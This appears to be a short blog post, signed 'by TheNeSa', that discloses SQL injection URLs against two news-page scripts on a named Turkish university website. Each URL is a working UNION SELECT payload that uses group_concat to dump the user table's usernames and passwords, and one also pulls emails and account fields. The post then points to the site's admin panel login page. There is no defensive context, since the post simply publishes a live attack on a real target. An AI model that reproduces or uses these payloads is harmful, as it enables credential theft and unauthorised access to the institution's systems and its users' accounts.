Site:
www2.bayar.edu.tr
SQL:
http://www2.bayar.edu.tr/duyuru/haber/yazicidostu.php?id=72%20and%201=1+union
+select+0,1,2,3,4,5,6,7,group_concat(username,0x3a,sifre)
,9,10,11,12,13,14,15,16,17,18,19,20,21,23+from+user
http://www2.bayar.edu.tr/duyuru/haber/haber.php?id=316%20and%201=2+union
%20select%201,2,3,4,5,6,7,8,group_concat
(id1,0x3a,username,0x3a,email,0x3a,sifre,0x3a,
aktiv,0x3a,aktson,0x3a),10,11,12,13,14,15,16,17,18
,19,20,21,22,23+from+user--
panel:
http://www2.bayar.edu.tr/duyuru/haber/panel/login.php
by TheNeSa
Hiç yorum yok:
Yorum Gönder